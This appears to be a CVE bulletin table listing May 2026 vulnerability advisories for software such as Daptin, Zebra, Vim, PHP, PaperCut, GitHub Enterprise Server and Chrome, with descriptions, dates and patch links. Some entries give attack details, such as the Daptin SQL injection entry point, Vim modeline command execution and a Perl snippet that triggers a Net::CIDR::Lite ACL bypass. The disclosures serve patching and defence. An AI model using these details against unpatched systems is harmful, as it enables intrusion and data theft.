| daptin--daptin | Daptin is a GraphQL/JSON-API headless CMS. Prior to version 0.11.5, processFuzzySearch in server/resource/resource_findallpaginated.go:1484 splits the user-supplied column parameter by comma and interpolates each segment directly into goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col)) raw SQL with no column whitelist check. The entry point is GET /api/<entity> with operator=fuzzy (or fuzzy_any, fuzzy_all). Any authenticated user - including one who self-registered with no admin involvement - can read the entire database. This issue has been patched in version 0.11.5. | 2026-05-07 | not yet calculated | CVE-2026-44349 | https://github.com/daptin/daptin/security/advisories/GHSA-pwqg-q8pg-pp6r https://github.com/daptin/daptin/releases/tag/v0.11.5 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.4.0 and prior to zebra-script version 6.0.0, the fix for CVE-2026-41583 introduced a separate issue due to insufficient error handling of the case where the sighash type is invalid, during sighash computation. Instead of returning an error, the normal flow would resume, and the input sighash buffer would be left untouched. In scenarios where a previous signature validation could leave a valid sighash in the buffer, an invalid hash-type could be incorrectly accepted, which would create a consensus split between Zebra and zcashd nodes. This issue has been patched in zebrad version 4.4.0 and zebra-script version 6.0.0. | 2026-05-08 | not yet calculated | CVE-2026-44497 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-gq4h-3grw-2rhv |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to version 4.4.0, Zebra's block validator undercounts transparent signature operations against the 20000-sigop block limit (MAX_BLOCK_SIGOPS), allowing it to accept blocks that zcashd rejects with bad-blk-sigops. A miner who produces such a block can split the network: Zebra nodes follow the offending chain while zcashd nodes do not. This issue has been patched in version 4.4.0. | 2026-05-08 | not yet calculated | CVE-2026-44498 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-jv4h-j224-23cc https://github.com/ZcashFoundation/zebra/releases/tag/v4.4.0 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to version 4.4.0, a composite denial-of-service vulnerability in Zebra's block discovery pipeline allows an unauthenticated remote attacker to permanently halt all new block discovery on a targeted node. The attack exploits three independent weaknesses in the gossip, syncer, and download subsystems - all exercisable from a single TCP connection - to create a monotonically growing block deficit that never self-heals. This issue has been patched in version 4.4.0. | 2026-05-08 | not yet calculated | CVE-2026-44499 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-h9hm-m2xj-4rq9 |
| vim--vim | Vim is an open source, command line text editor. Prior to version 9.2.0435, an OS command injection vulnerability exists in Vim's :find command-line completion. When the path option contains backtick-enclosed shell commands, those commands are executed during file name completion. Because the path option lacks the P_SECURE flag, it can be set from a modeline, allowing an attacker who controls the contents of a file to execute arbitrary shell commands when the user opens that file in Vim and triggers :find completion. This issue has been patched in version 9.2.0435. | 2026-05-08 | not yet calculated | CVE-2026-44656 | https://github.com/vim/vim/security/advisories/GHSA-hwg5-3cxw-wvvg https://github.com/vim/vim/commit/190cb3c2b9c769a3972bcfd991a7b5b6cb771ef0 https://github.com/vim/vim/releases/tag/v9.2.0435 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. From version 2.18.7 to before version 2.50.2, there is an authenticated server-side request forgery vulnerability affecting the webhook trigger tools, the n8n API client (N8N_API_URL), and per-request URLs supplied via the x-n8n-url header in multi-tenant HTTP mode. This issue has been patched in version 2.50.2. | 2026-05-08 | not yet calculated | CVE-2026-44694 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-cmrh-wvq6-wm9r https://github.com/czlonkowski/n8n-mcp/commit/bcaba839409d470abeb4a6ad9b361b553a1098eb https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.50.2 |
| RRWO--Plack::Middleware::Statsd | Plack::Middleware::Statsd versions before 0.9.0 for Perl may leak user IP addresses. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' IP addresses may be leaked. Since version 0.9.0, the IP address is no longer logged to statsd unless configured. When configured, an HMAC signature of the IP address is logged instead. | 2026-05-10 | not yet calculated | CVE-2026-45179 | https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx https://metacpan.org/release/RRWO/Plack-Middleware-Statsd-v0.9.0/changes |
| RRWO--Catalyst::Plugin::Statsd | Catalyst::Plugin::Statsd versions through 0.10.0 for Perl may leak session ids. If the communication channel to the statsd daemon is not secured (for example, by sending UDP packets to a host on another network), then users' session ids may be leaked. This may allow an attacker to use session ids as authentication tokens. | 2026-05-10 | not yet calculated | CVE-2026-45180 | https://github.com/robrwo/CatalystX-Statsd/security/advisories/GHSA-gjvr-hq83-fc38 https://metacpan.org/release/RRWO/Catalyst-Plugin-Statsd-v0.10.0/changes https://www.cve.org/CVERecord?id=CVE-2026-45179 https://github.com/robrwo/Plack-Middleware-Statsd/security/advisories/GHSA-9gwm-665p-w2xx |
| STIGTSP--Net::CIDR::Lite | Net::CIDR::Lite versions before 0.24 for Perl do not properly validate IP address and CIDR mask inputs, which may allow IP ACL bypass. Inputs containing a trailing newline or non-ASCII digit characters pass the validators but are then re-encoded by the parser to a different address than the input string spelled. find() and bin_find() can match or miss addresses as a result. Example: my $cidr = Net::CIDR::Lite->new(); $cidr->add("::1\n/128"); $cidr->find("::1a"); (incorrectly returns true). See also CVE-2026-45191. | 2026-05-10 | not yet calculated | CVE-2026-45190 | https://github.com/stigtsp/Net-CIDR-Lite/commit/ca9542adec87110556601d7ce48381ea8d13e692.patch https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes https://www.cve.org/CVERecord?id=CVE-2026-45191 |
| STIGTSP--Net::CIDR::Lite | Net::CIDR::Lite versions before 0.24 for Perl do not properly consider extraneous zero characters in CIDR mask values, which may allow IP ACL bypass. Mask forms like "/00" and "/01" pass validation and parse to the same prefix as their unpadded value. See also CVE-2026-45190. | 2026-05-10 | not yet calculated | CVE-2026-45191 | https://github.com/stigtsp/Net-CIDR-Lite/commit/24e2c439ec405e5256024b9acefd4f7008c5ed0c.patch https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes https://www.cve.org/CVERecord?id=CVE-2026-45190 |
| Unknown--OttoKit: All-in-One Automation Platform | The OttoKit: All-in-One Automation Platform WordPress plugin before 1.1.23 does not properly sanitize user input before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. | 2026-05-08 | not yet calculated | CVE-2026-4935 | https://wpscan.com/vulnerability/54bc1bf4-1033-49e2-aff9-a14c834c35bd/ |
| CHORNY--Apache::Session::Generate::ModUniqueId | Apache::Session::Generate::ModUniqueId versions from 1.54 through 1.94 for Perl generate insecure session ids. Apache::Session::Generate::ModUniqueId (added in version 1.54) uses the value of the UNIQUE_ID environment variable for the session id. The UNIQUE_ID variable is set by the Apache mod_unique_id plugin, which generates unique ids for the request. The id is based on the IPv4 address, the process id, the epoch time, a 16-bit counter and a thread index, with no obfuscation. The server IP is often available to the public, and if not available, can be guessed from previous session ids being issued. The process ids may also be guessed from previous session ids. The timestamp is easily guessed (and leaked in the HTTP Date response header). The purpose of mod_unique_id is to assign a unique id to requests so that events can be correlated in different logs. The id is not designed for, nor is it suitable for, security purposes. | 2026-05-06 | not yet calculated | CVE-2026-5081 | https://httpd.apache.org/docs/current/mod/mod_unique_id.html https://metacpan.org/pod/Apache::Session::Generate::Random |
| Unknown--Magic Export & Import | The Magic Export & Import WordPress plugin before 1.2.0 stores exported CSV files at a publicly accessible location, making it possible for any visitors to leak sensitive user information. | 2026-05-04 | not yet calculated | CVE-2026-5335 | https://wpscan.com/vulnerability/ed6f00de-bbae-4e89-9d0e-ded0d70e781c/ |
| PHP Group--PHP | In PHP versions 8.4.* before 8.4.21 and 8.5.* before 8.5.6, when an encoding name containing an embedded NUL byte is passed to mb_convert_encoding() or related mbstring functions, the code incorrectly assumes that when strncasecmp() returns 0 it means the strings have the same length. This can lead to an out-of-bounds read of global memory, potentially causing a crash or information disclosure. Affected functions include mb_convert_encoding(), mb_detect_encoding(), mb_convert_variables(), and mb_detect_order(), as well as the mbstring.detect_order and mbstring.http_output INI settings. | 2026-05-10 | not yet calculated | CVE-2026-6104 | https://github.com/php/php-src/security/advisories/GHSA-74r9-qxhc-fx53 |
| PaperCut--PaperCut NG/MF | A race condition exists in PaperCut MF when processing badge-swipe data from certain HP multifunction devices. Under specific network conditions involving dropped packets and out-of-order sequence counters, the server may incorrectly process fragmented data chunks. If a sequence reset notification fails to reach the server, the server may reject the initial data chunk while erroneously accepting subsequent chunks before a connection reset completes. This leads to the registration of a truncated badge ID string. While this typically results in an authentication failure, the vulnerability is compounded in environments utilizing custom badge-ID post-processing scripts. In such configurations, the truncated string may be transformed into a valid ID belonging to a different user, leading to unauthorized session establishment (Incorrect User Login) on the device. | 2026-05-05 | not yet calculated | CVE-2026-6180 | https://www.papercut.com/kb/Main/papercut-ng-mf-and-papercut-hive-security-bulletin-may-2026/ |
| The Qt Company--Qt | A type confusion vulnerability in Qt SVG allows an attacker to cause an application crash via a crafted SVG image. When processing SVG marker references, the renderer retrieves a node by its id attribute and casts it to QSvgMarker* without verifying the node type. A non-marker element (such as a <line> element) that references itself as a marker triggers an out-of-bounds heap read due to the object size difference between QSvgLine and QSvgMarker, followed by an endless recursion that bypasses the marker recursion guard through incorrect virtual dispatch. The result is an application crash (denial of service). This issue affects Qt SVG: from 6.7.0 before 6.8.8, from 6.9.0 before 6.11.1. | 2026-05-06 | not yet calculated | CVE-2026-6210 | https://codereview.qt-project.org/c/qt/qtsvg/+/724887 https://issues.oss-fuzz.com/issues/496327371 |
| Remote Spark (https://www.remotespark.com/)--SparkView | A vulnerability in Remote Spark SparkView before build 1122 allows an attacker to bypass the local connection check and achieve arbitrary code execution as root on the server side. Depending on the implementation, the vulnerability can be exploited by an unauthenticated attacker. | 2026-05-08 | not yet calculated | CVE-2026-6213 | https://www.remotespark.com/view/new.html |
| PaperCut--PaperCut NG/MF | An issue was discovered in the Shared Account Synchronization component of PaperCut MF (version 25.0.4). The application allows administrative users to configure a source path for account data synchronization. Due to a lack of proper path validation and sanitization, an authenticated user with administrative privileges can specify arbitrary file paths on the local file system. This allows for the enumeration of directory structures and the unauthorized reading of sensitive text-based configuration or system files. When the synchronization process is triggered, the application attempts to parse the contents of the specified file, subsequently exposing the data within the application's account management interface. This vulnerability could lead to the disclosure of sensitive system information or configuration details, depending on the permissions of the service account under which the application is running. | 2026-05-05 | not yet calculated | CVE-2026-6418 | https://www.papercut.com/kb/Main/papercut-ng-mf-and-papercut-hive-security-bulletin-may-2026/ |
| ILM Informatique--OpenConcerto | Incorrect Permission Assignment for Critical Resource vulnerability in ILM Informatique OpenConcerto allows Replace Binaries. This issue affects OpenConcerto: 1.7.5. | 2026-05-04 | not yet calculated | CVE-2026-6499 | https://www.openconcerto.org/fr/version-1.7.html |
| ILM Informatique--OpenConcerto | Plaintext storage of a password vulnerability in ILM Informatique OpenConcerto allows Retrieve Embedded Sensitive Data. This issue affects OpenConcerto: 1.7.5. | 2026-05-04 | not yet calculated | CVE-2026-6500 | https://www.openconcerto.org/fr/version-1.7.html |
| ILM Informatique--jOpenDocument | Improper restriction of XML external entity reference vulnerability in ILM Informatique jOpenDocument allows Data Serialization External Entities Blowup. This issue affects jOpenDocument: 1.5. | 2026-05-04 | not yet calculated | CVE-2026-6501 | https://www.jopendocument.org/documentation.html |
| RSAVAGE--Crypt::PasswdMD5 | Crypt::PasswdMD5 versions through 1.42 for Perl generates insecure random values for salts. The built-in rand function is predictable, and unsuitable for cryptography. | 2026-05-08 | not yet calculated | CVE-2026-6659 | https://metacpan.org/release/RSAVAGE/Crypt-PasswdMD5-1.42/source/lib/Crypt/PasswdMD5.pm#L35-47 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, the SOAP extension's object deduplication mechanism stores pointers to PHP objects in a global map without incrementing their reference counts. When an apache:Map node contains duplicate keys, processing the second entry overwrites the first in the temporary result map, freeing the original PHP object while its stale pointer remains in the map. A subsequent href reference to the freed node can copy the dangling pointer into the result. As PHP string allocations can reclaim the freed memory region, an attacker with control over the SOAP request body can exploit this use-after-free to achieve remote code execution. | 2026-05-10 | not yet calculated | CVE-2026-6722 | https://github.com/php/php-src/security/advisories/GHSA-85c2-q967-79q5 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, due to improper sanitization of user data, an attacker can compose a URL which will cause the target to execute arbitrary JavaScript code (XSS) on the target's machine when the target is viewing the PHP-FPM status page. | 2026-05-10 | not yet calculated | CVE-2026-6735 | https://github.com/php/php-src/security/advisories/GHSA-7qg2-v9fj-4mwv |
| GitHub--Enterprise Server | An authentication bypass vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to create a local user account, bypassing the configured external identity provider. When external authentication was enabled, the signup endpoint did not properly enforce the authentication restriction, allowing account creation and session establishment without identity provider validation. The created account was limited to the default base permissions configured on the instance. Exploitation required network access to a GHES instance configured with an external authentication provider. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.2, 3.19.6, 3.18.9, 3.17.15, and 3.16.18. | 2026-05-07 | not yet calculated | CVE-2026-6736 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.18 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.15 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.9 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| ASUS--AsusPTPFilter | An Exposed IOCTL with Insufficient Access Control vulnerability in AsusPTPFilter allows a local user to bypass driver security mechanisms and obtain restricted touchpad information or render the touchpad unusable via crafted IOCTL requests. Refer to the 'Security Update for ASUS Precision Touchpad' section on the ASUS Security Advisory for more information. | 2026-05-08 | not yet calculated | CVE-2026-6737 | https://www.asus.com/security-advisory |
| WatchGuard--WatchGuard Agent | Use of Hard-coded Cryptographic Key vulnerability in WatchGuard Agent on Windows allows Inclusion of Code in Existing Process. This issue affects WatchGuard Agent: before 1.25.03.0000. | 2026-05-06 | not yet calculated | CVE-2026-6787 | https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00013 |
| WatchGuard--WatchGuard Agent | Uncontrolled Search Path Element vulnerability in WatchGuard Agent on Windows allows Using Malicious Files. This issue affects WatchGuard Agent before 1.25.03.0000. | 2026-05-06 | not yet calculated | CVE-2026-6788 | https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00013 |
| Ercom--Cryptobox | A vulnerability in the external sharing feature of Cryptobox allows an attacker who knows a sharing link URL to retrieve information from the server that enables an offline brute-force attack on the access code associated with that sharing link. | 2026-05-07 | not yet calculated | CVE-2026-6805 | https://info.cryptobox.com/doc/v4.40/4.40.en/ |
| Eclipse Foundation--Eclipse Vert.x | A TCP client can perform a TLS handshake and present the server name extension with a server name that is accepted by a server wildcard name, e.g. if the server is configured with a certificate accepting *.example.com, any XYZ.example.com where xyz is a valid name can be used. | 2026-05-06 | not yet calculated | CVE-2026-6860 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/381 https://github.com/eclipse-vertx/vert.x/security/advisories/GHSA-3g76-f9xq-8vp6 https://github.com/eclipse-vertx/vert.x/pull/6102 |
| Eclipse Foundation--Eclipse OpenJ9 | In Eclipse OpenJ9 versions 0.21 to 0.58, a pre-authentication remote attacker can crash JITServer by sending a 32-byte crafted TCP message. | 2026-05-05 | not yet calculated | CVE-2026-6918 | https://github.com/eclipse-openj9/openj9/security/advisories/GHSA-q393-vr4c-969r https://github.com/eclipse-openj9/openj9/pull/23793 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, some functions, including urldecode(), pass a signed char to ctype functions (like isxdigit()). On systems with a signed char by default and optimized table-lookup ctype functions, such as NetBSD, this can lead to accessing an array with a negative offset, which can trigger a denial of service. | 2026-05-10 | not yet calculated | CVE-2026-7258 | https://github.com/php/php-src/security/advisories/GHSA-m8rr-4c36-8gq4 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, a mismatch between encoding lists in Oniguruma and mbfl leads to a NULL pointer dereference, resulting in a segmentation fault and denial of service. The vulnerability is exploitable when user-controlled input can influence the encoding passed to mb_regex_encoding(). | 2026-05-10 | not yet calculated | CVE-2026-7259 | https://github.com/php/php-src/security/advisories/GHSA-wm6j-2649-pv75 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, when SoapServer is configured with SOAP_PERSISTENCE_SESSION, the handler object is persisted across requests via session storage. However, when a SOAP request results in an error, the persistence is handled incorrectly, resulting in the object being freed while a pointer to it is kept, which may lead to a use-after-free. This may lead to memory corruption, information disclosure, or process crashes, with confidentiality, integrity, and availability impact on the vulnerable system. | 2026-05-10 | not yet calculated | CVE-2026-7261 | https://github.com/php/php-src/security/advisories/GHSA-m33r-qmcv-p97q |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, when a SOAP server has a typemap configured, the decoding process contains a mistake which checks the wrong variable in case of a missing value element. This leads to dereferencing a NULL pointer, causing a segmentation fault. This allows a remote unauthenticated attacker to crash the PHP SOAP server process, resulting in denial of service. | 2026-05-10 | not yet calculated | CVE-2026-7262 | https://github.com/php/php-src/security/advisories/GHSA-hmxp-6pc4-f3vv |
| PHP Group--PHP | In PHP versions 8.4.* before 8.4.21 and 8.5.* before 8.5.6, the DOMNode::C14N() method may process the XML data incorrectly, causing a circular linked list in the data structure representing the XML document. This may cause subsequent processing of the XML document to enter an infinite loop, causing denial of service in the processing application. | 2026-05-10 | not yet calculated | CVE-2026-7263 | https://github.com/php/php-src/security/advisories/GHSA-4jhr-8w89-j733 |
| GitHub--Enterprise Server | A denial of service vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause service disruption by sending crafted requests with deeply nested JSON payloads to an unauthenticated API endpoint. The endpoint parsed user-controlled JSON request bodies without size or depth limits, causing excessive CPU and memory consumption. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.2, 3.19.6, 3.18.9, 3.17.15, and 3.16.18. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-07 | not yet calculated | CVE-2026-7541 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.18 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.15 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.9 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| PHP Group--PHP | In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, and 8.5.* before 8.5.6, the metaphone() function in ext/standard/metaphone.c uses a signed int variable to track the current position within the input string. If a string longer than 2,147,483,647 bytes is passed, a signed integer overflow occurs, resulting in undefined behavior. This can lead to an out-of-bounds read, causing a segmentation fault or access to unrelated memory, and may affect the availability of the PHP process. | 2026-05-10 | not yet calculated | CVE-2026-7568 | https://github.com/php/php-src/security/advisories/GHSA-96wq-48vp-hh57 |
| PaperCut--PaperCut Hive | An issue was discovered in the PaperCut Hive Ricoh embedded application. When the "Deep Logging" (diagnostic) mode is enabled, the application inadvertently records administrative credentials in plain text within the log files. An attacker with administrative access to the PaperCut Hive management portal could remotely enable deep logging and subsequently retrieve sensitive device passwords from the logs after an authorized user authenticates at the device. This exposure allows for lateral movement or unauthorized configuration of the physical print hardware. | 2026-05-05 | not yet calculated | CVE-2026-7824 | https://www.papercut.com/kb/Main/papercut-ng-mf-and-papercut-hive-security-bulletin-may-2026/ |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 exposes server environment variables through an unauthenticated endpoint in the new GINA UI, allowing remote attackers to obtain sensitive system information. | 2026-05-08 | not yet calculated | CVE-2026-7864 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| Crestron Electronics--Touchpanels (x60/x70) | A hidden console command is vulnerable to a command injection flaw when control characters are passed to its second argument. Third-party researcher Eugene Lim discovered the vulnerability in the way the console command passes its input to a popen function call. Attackers with authenticated access to the SSH console of Crestron devices may use it to run underlying OS commands. | 2026-05-05 | not yet calculated | CVE-2026-7865 | https://www.crestron.com/Software-Firmware/Firmware/Touchpanels/TS-770-TS-1070-TSS-770-TSS-1070-TSW-570/3-003-0015-001 https://www.crestron.com/release_notes/tsw-xx70_3.003.0015.001_release_notes.pdf |
| DIVD--VerySecureApp | The VerySecureApp made by DIVD using Mendix Studio Pro 11.8.0 Beta allows unintended data exposure due to an authorization misconfiguration. The VerySecureApp allows anonymous users of the MyFirstModule with the anonymous user role to gain access to all stored records, even though no access rights are explicitly configured for that role. Anonymous users are required to make a Mendix Entity available publicly. All versions of Mendix Studio Pro up to 11.8.0 Beta silently make an Anonymous user role follow user inheritance rules, without mentioning this explicitly in the documentation. | 2026-05-07 | not yet calculated | CVE-2026-7891 | https://csirt.divd.nl/DIVD-2026-00006/ https://www.divd.nl/mendix.html |
| Google--Chrome | Integer overflow in Blink in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-06 | not yet calculated | CVE-2026-7896 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493747582 |
| Google--Chrome | Use after free in Mobile in Google Chrome on iOS prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-06 | not yet calculated | CVE-2026-7897 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504069514 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Linux prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-05-06 | not yet calculated | CVE-2026-7898 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504587882 |
| Google--Chrome | Out of bounds read and write in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7899 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505481948 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7900 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496503799 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Mac prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7901 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497724490 |
| Google--Chrome | Out of bounds memory access in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7902 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502030575 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome on Mac, Windows prior to 148.0.7778.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7903 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/491760376 |
| Google--Chrome | Out of bounds read in Fonts in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7904 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492350406 |
| Google--Chrome | Insufficient validation of untrusted input in Media in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7905 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495259842 |
| Google--Chrome | Use after free in SVG in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7906 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496284584 |
| Google--Chrome | Use after free in DOM in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7907 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496292089 |
| Google--Chrome | Use after free in Fullscreen in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7908 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497436531 |
| Google--Chrome | Inappropriate implementation in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7909 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497437113 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7910 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497543810 |
| Google--Chrome | Use after free in Aura in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7911 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497548912 |
| Google--Chrome | Integer overflow in GPU in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7912 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497639714 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome on Android prior to 148.0.7778.96 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7913 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497936728 |
| Google--Chrome | Type Confusion in Accessibility in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7914 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498401609 |
| Google--Chrome | Insufficient data validation in DevTools in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7915 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498454478 |
| Google--Chrome | Insufficient data validation in InterestGroups in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7916 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498720754 |
| Google--Chrome | Use after free in Fullscreen in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7917 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498752242 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7918 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498780188 |
